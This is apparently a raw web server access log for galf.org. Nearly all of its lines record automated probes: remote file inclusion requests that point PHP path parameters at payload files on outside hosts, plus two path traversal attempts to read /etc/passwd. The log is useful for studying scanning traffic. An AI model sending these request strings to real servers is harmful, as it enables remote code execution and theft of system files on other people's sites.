77.221.130.17 - - [08/Nov/2009:23:31:41 -0800] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.easyman.com.tw/na3/sempak.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
67.214.143.99 - - [08/Nov/2009:23:32:01 -0800] "GET /skin/ggambo7002_board/basic.php?dir=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.214.143.99 - - [08/Nov/2009:23:32:02 -0800] "GET /logs/access_091005.log//skin/ggambo7002_board/basic.php?dir=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.214.143.99 - - [08/Nov/2009:23:32:02 -0800] "GET /logs//skin/ggambo7002_board/basic.php?dir=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:23:32:10 -0800] "GET /logs/access_090601.log///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.easyman.com.tw/na3/sempak.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:23:32:11 -0800] "GET /logs/access_090601.log///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.easyman.com.tw/na3/sempak.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:23:32:12 -0800] "GET /logs/access_090601.log///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.easyman.com.tw/na3/sempak.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
61.103.24.110 - - [08/Nov/2009:23:32:14 -0800] "GET /faqsupport/samplefaqsupport.php?path[docroot]=%20http://buntutkud4.fileave.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.103.24.110 - - [08/Nov/2009:23:32:45 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=%20http://buntutkud4.fileave.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.103.24.110 - - [08/Nov/2009:23:32:52 -0800] "GET /logs/access_090720.log//faqsupport/samplefaqsupport.php?path[docroot]=%20http://buntutkud4.fileave.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.90.16.57 - - [08/Nov/2009:23:33:17 -0800] "GET /common/db.php?commonpath=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.90.16.57 - - [08/Nov/2009:23:33:17 -0800] "GET /logs/access_090608.log%20%20//common/db.php?commonpath=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.90.16.57 - - [08/Nov/2009:23:33:17 -0800] "GET /logs//common/db.php?commonpath=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.124.127.164 - - [08/Nov/2009:23:34:44 -0800] "GET /logs/access_091012.log%20%20//?_PHPLIB[libdir]=http://www.kerfootgroup.co.uk/kf_pics/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.229.252.11 - - [08/Nov/2009:23:35:25 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.socialworkleadership.org/nsw/admin/reports/id/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.229.252.11 - - [08/Nov/2009:23:35:25 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.socialworkleadership.org/nsw/admin/reports/id/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.229.252.11 - - [08/Nov/2009:23:35:25 -0800] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.socialworkleadership.org/nsw/admin/reports/id/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.229.252.11 - - [08/Nov/2009:23:35:25 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.socialworkleadership.org/nsw/admin/reports/id/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.229.252.11 - - [08/Nov/2009:23:35:25 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.socialworkleadership.org/nsw/admin/reports/id/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.229.252.11 - - [08/Nov/2009:23:35:25 -0800] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.socialworkleadership.org/nsw/admin/reports/id/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.124.127.164 - - [08/Nov/2009:23:36:06 -0800] "GET /logs/access_091012.log%20%20//?_PHPLIB[libdir]=http://www.kerfootgroup.co.uk/kf_pics/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.237.233.202 - - [08/Nov/2009:23:36:13 -0800] "GET /logs/access_090525.log/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.237.233.202 - - [08/Nov/2009:23:36:13 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.237.233.202 - - [08/Nov/2009:23:36:13 -0800] "GET /logs/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.237.233.202 - - [08/Nov/2009:23:36:26 -0800] "GET /logs/access_090504.log/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.179.121 - - [08/Nov/2009:23:36:34 -0800] "GET /logs/access.log/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/tukulid.txt?? HTTP/1.1" 404 - "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "galf.org"
72.55.179.121 - - [08/Nov/2009:23:36:34 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/tukulid.txt?? HTTP/1.1" 404 - "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "galf.org"
72.55.179.121 - - [08/Nov/2009:23:36:34 -0800] "GET /logs/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/tukulid.txt?? HTTP/1.1" 404 - "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "galf.org"
85.25.94.14 - - [08/Nov/2009:23:36:44 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
85.25.94.14 - - [08/Nov/2009:23:36:44 -0800] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
85.25.94.14 - - [08/Nov/2009:23:36:44 -0800] "GET /logs/access_091012.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
72.55.179.121 - - [08/Nov/2009:23:37:13 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/tukulid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "galf.org"
72.55.179.121 - - [08/Nov/2009:23:37:13 -0800] "GET /logs/access.log/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/tukulid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "galf.org"
72.55.179.121 - - [08/Nov/2009:23:37:13 -0800] "GET /logs/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/tukulid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "galf.org"
203.237.233.202 - - [08/Nov/2009:23:38:10 -0800] "GET /logs/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.237.233.202 - - [08/Nov/2009:23:38:10 -0800] "GET /logs/access_090525.log/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.237.233.202 - - [08/Nov/2009:23:38:10 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.237.233.202 - - [08/Nov/2009:23:38:21 -0800] "GET /logs/access_090504.log/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.90.16.57 - - [08/Nov/2009:23:38:26 -0800] "GET /logs/access_090615.log%20%20//common/db.php?commonpath=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.124.127.164 - - [08/Nov/2009:23:40:12 -0800] "GET /?_PHPLIB[libdir]=http://www.kerfootgroup.co.uk/kf_pics/id1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
121.124.127.164 - - [08/Nov/2009:23:40:12 -0800] "GET /logs/access.log%20%20//?_PHPLIB[libdir]=http://www.kerfootgroup.co.uk/kf_pics/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
121.124.127.164 - - [08/Nov/2009:23:40:12 -0800] "GET /logs//?_PHPLIB[libdir]=http://www.kerfootgroup.co.uk/kf_pics/id1.txt???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "galf.org"
121.124.127.164 - - [08/Nov/2009:23:40:19 -0800] "GET /?_PHPLIB[libdir]=http://www.kerfootgroup.co.uk/kf_pics/id1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
121.124.127.164 - - [08/Nov/2009:23:40:19 -0800] "GET /logs/access.log%20%20//?_PHPLIB[libdir]=http://www.kerfootgroup.co.uk/kf_pics/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
121.124.127.164 - - [08/Nov/2009:23:40:19 -0800] "GET /logs//?_PHPLIB[libdir]=http://www.kerfootgroup.co.uk/kf_pics/id1.txt???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "galf.org"
87.139.66.104 - - [08/Nov/2009:23:40:27 -0800] "GET /?sourcedir=http://gminamakow.info//dmdocuments/mambo?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.galf.org"
87.139.66.104 - - [08/Nov/2009:23:40:27 -0800] "GET /logs/?sourcedir=http://gminamakow.info//dmdocuments/mambo?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.galf.org"
61.103.24.110 - - [08/Nov/2009:23:40:43 -0800] "GET /logs/access_090406.log//faqsupport/samplefaqsupport.php?path[docroot]=%20http://buntutkud4.fileave.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.90.16.57 - - [08/Nov/2009:23:41:39 -0800] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.90.16.57 - - [08/Nov/2009:23:41:39 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.90.16.57 - - [08/Nov/2009:23:41:39 -0800] "GET /logs/access_090413.log%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.90.16.57 - - [08/Nov/2009:23:41:46 -0800] "GET /logs/access_090427.log%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.90.16.57 - - [08/Nov/2009:23:42:16 -0800] "GET /logs/access_090518.log%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [08/Nov/2009:23:43:53 -0800] "GET /logs/access_090629.log/contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://avto-tulun.ru/images/avatars/.source/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [08/Nov/2009:23:44:00 -0800] "GET /logs/access_090921.log/contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://avto-tulun.ru/images/avatars/.source/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.90.16.57 - - [08/Nov/2009:23:46:04 -0800] "GET /logs/access_090803.log%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.90.16.57 - - [08/Nov/2009:23:46:04 -0800] "GET /logs/access_090420.log%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.90.16.57 - - [08/Nov/2009:23:46:34 -0800] "GET /logs/access_090406.log%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.90.16.57 - - [08/Nov/2009:23:46:39 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.90.16.57 - - [08/Nov/2009:23:46:39 -0800] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.90.16.57 - - [08/Nov/2009:23:46:39 -0800] "GET /logs/access_090309.log%20%20//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.229.252.11 - - [08/Nov/2009:23:49:16 -0800] "GET /logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.socialworkleadership.org/nsw/admin/reports/id/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [08/Nov/2009:23:52:06 -0800] "GET /?DOCUMENT_ROOT=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [08/Nov/2009:23:52:06 -0800] "GET /logs/?DOCUMENT_ROOT=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [08/Nov/2009:23:52:06 -0800] "GET /logs/access_090824.log/?DOCUMENT_ROOT=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [08/Nov/2009:23:52:07 -0800] "GET /?DOCUMENT_ROOT=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [08/Nov/2009:23:52:07 -0800] "GET /logs/?DOCUMENT_ROOT=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [08/Nov/2009:23:52:07 -0800] "GET /logs/access_090824.log/?DOCUMENT_ROOT=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [08/Nov/2009:23:52:49 -0800] "GET /logs/access_090706.log/?DOCUMENT_ROOT=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.90.16.57 - - [08/Nov/2009:23:53:33 -0800] "GET /logs/access_090608.log//common/db.php?commonpath=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:23:54:13 -0800] "GET /logs/access.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://katrok.fileave.com/a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:23:54:13 -0800] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://katrok.fileave.com/a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:23:54:13 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://katrok.fileave.com/a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:23:54:13 -0800] "GET /logs/access_090713.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://katrok.fileave.com/a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.90.16.57 - - [08/Nov/2009:23:54:25 -0800] "GET /logs/access_090615.log//common/db.php?commonpath=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:23:54:28 -0800] "GET /logs/access.log%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://katrok.fileave.com/a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:23:54:28 -0800] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://katrok.fileave.com/a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:23:54:28 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://katrok.fileave.com/a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:23:54:28 -0800] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://katrok.fileave.com/a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:23:54:28 -0800] "GET /logs/access.log%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://katrok.fileave.com/a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:23:54:28 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://katrok.fileave.com/a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:23:54:31 -0800] "GET /logs/access_090713.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://katrok.fileave.com/a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:23:54:31 -0800] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://katrok.fileave.com/a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:23:54:31 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://katrok.fileave.com/a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:23:54:31 -0800] "GET /logs/access.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://katrok.fileave.com/a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:23:54:49 -0800] "GET /logs/access_090720.log%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://katrok.fileave.com/a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:23:54:49 -0800] "GET /logs/access_090720.log%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://katrok.fileave.com/a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
96.31.90.40 - - [08/Nov/2009:23:57:32 -0800] "GET /?cfg=./../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1048 "-" "-" "www.galf.org"
96.31.90.40 - - [08/Nov/2009:23:57:51 -0800] "GET /?cfg=./../../../../../../../../etc/passwd HTTP/1.1" 200 1048 "-" "-" "www.galf.org"
203.237.233.202 - - [08/Nov/2009:23:58:16 -0800] "GET /logs/access_090511.log/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.237.233.202 - - [08/Nov/2009:23:59:18 -0800] "GET /logs/access_090824.log/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.237.233.202 - - [09/Nov/2009:00:00:00 -0800] "GET /logs/access_090824.log/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.237.233.202 - - [09/Nov/2009:00:00:00 -0800] "GET /logs/access_090511.log/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.123.212.188 - - [09/Nov/2009:00:01:25 -0800] "GET /logs/access_090511.log//include/admin.lib.inc.php?site_path=http://www.acumuladoresroverano.com/errors/401/id1.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.123.212.188 - - [09/Nov/2009:00:01:25 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.acumuladoresroverano.com/errors/401/id1.gif??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.123.212.188 - - [09/Nov/2009:00:01:25 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.acumuladoresroverano.com/errors/401/id1.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [09/Nov/2009:00:01:52 -0800] "GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [09/Nov/2009:00:01:52 -0800] "GET /logs/access_091012.log%20%20//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [09/Nov/2009:00:01:52 -0800] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [09/Nov/2009:00:01:54 -0800] "GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [09/Nov/2009:00:01:54 -0800] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [09/Nov/2009:00:01:55 -0800] "GET /logs/access_091012.log%20%20//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [09/Nov/2009:00:03:01 -0800] "GET /logs/access_091012.log%20%20//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [09/Nov/2009:00:03:01 -0800] "GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [09/Nov/2009:00:03:01 -0800] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [09/Nov/2009:00:03:19 -0800] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [09/Nov/2009:00:03:19 -0800] "GET /logs/access_091012.log%20%20//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [09/Nov/2009:00:03:19 -0800] "GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.237.233.202 - - [09/Nov/2009:00:03:35 -0800] "GET /logs/access.log/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.237.233.202 - - [09/Nov/2009:00:03:35 -0800] "GET /logs/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.237.233.202 - - [09/Nov/2009:00:03:35 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.73.17.7 - - [09/Nov/2009:00:03:43 -0800] "GET /?DOCUMENT_ROOT=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [09/Nov/2009:00:03:43 -0800] "GET /logs/access_090824.log/?DOCUMENT_ROOT=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
